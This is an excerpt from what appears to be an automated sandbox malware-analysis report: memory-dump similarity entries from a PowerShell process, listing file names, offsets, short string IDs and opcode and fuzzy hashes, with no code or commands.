Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: tPjq$$jq$$jq$$jq$$jq
• API String ID: 0-2650090061
• Opcode ID: ac6eb7d3e0d3dd4af592557c7dfcd2478756ac3ca671aa861e77308bfe37a188
• Instruction ID: 193e591c3165eebfba1d6773c908787d00ca72d7a831f2f2cec07b601de0c2d9
• Opcode Fuzzy Hash: ac6eb7d3e0d3dd4af592557c7dfcd2478756ac3ca671aa861e77308bfe37a188
• Instruction Fuzzy Hash: 482125F2618216DFDB288F55C54096ABBB4EF95A21F18416AEC20AF391C731DE40C7A1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: $jq$$jq$$jq$bl$bl
• API String ID: 0-2622395122
• Opcode ID: 3da36016c9a093e758d2521a27c31d04532e17a9a972df36e3e666f67dc33e47
• Instruction ID: 0f6950f546d420bf2f9998d436dea347839fa4115e346b2ba52350607161596e
• Opcode Fuzzy Hash: 3da36016c9a093e758d2521a27c31d04532e17a9a972df36e3e666f67dc33e47
• Instruction Fuzzy Hash: C91138713403069FEB244A3AD800767B7ABFFC1761F28802AEC598B391EA35C840C752

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: (fll$(fll$(fll$(fll
• API String ID: 0-2347424031
• Opcode ID: 6522ef0b28bc5d2eb1b402edeaffb772eabf7e4575d4a37446528227139567cc
• Instruction ID: b119ec5aa6b1472bdb83dce93729a82543c9489a579c077bf51704be91e4fb50
• Opcode Fuzzy Hash: 6522ef0b28bc5d2eb1b402edeaffb772eabf7e4575d4a37446528227139567cc
• Instruction Fuzzy Hash: 3CF170B4B00205DFD714CF98C580AAAB7B2EFC9714F148569DC25AB754CB32EC42CBA6

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: (fll$(fll$(fll$(fll
• API String ID: 0-2347424031
• Opcode ID: 774857eb928a84af8d2de0c7330d343fff13e9bfe4e3bd4b63d0497470d91e02
• Instruction ID: 40dd80e466b7b8ce8b99806700c57f2acc89acf3c2280b70ee3b5fea5ba68da1
• Opcode Fuzzy Hash: 774857eb928a84af8d2de0c7330d343fff13e9bfe4e3bd4b63d0497470d91e02
• Instruction Fuzzy Hash: F1717AB4B00205DFD714DF68C550AAABBB3EF88310F148169D815BB755CB76E881CFA6

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: $jq$$jq$$jq$$jq
• API String ID: 0-2428501249
• Opcode ID: 45ab4dfcad4efcd6a7e3bc8683f2deee61bd145ce8e1ea3df36fc5a1f5ac64ae
• Instruction ID: 4aadc01cff800d3b97c8eabab53423305e3a1f3f025ac51269f1dd833cdda392
• Opcode Fuzzy Hash: 45ab4dfcad4efcd6a7e3bc8683f2deee61bd145ce8e1ea3df36fc5a1f5ac64ae
• Instruction Fuzzy Hash: 942137B23552065FEB249A3988507737BA6EFC2711F24842AED16CB381DD76D8408371

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'jq$4'jq$$jq$$jq
• API String ID: 0-1496060811
• Opcode ID: afbb6d3291cbe5d72d5236ed18ab7f20a359aa8383df648494ba658fd30347ce
• Instruction ID: 5384183b49cd00b2f47ee518ef41a07434cb419bc4fdd76ac4c3df0b22cd61f7
• Opcode Fuzzy Hash: afbb6d3291cbe5d72d5236ed18ab7f20a359aa8383df648494ba658fd30347ce
• Instruction Fuzzy Hash: 79012B607493964FC32B062C58202F6AFB7DFC355072941ABCC50DF287CD294D468BB6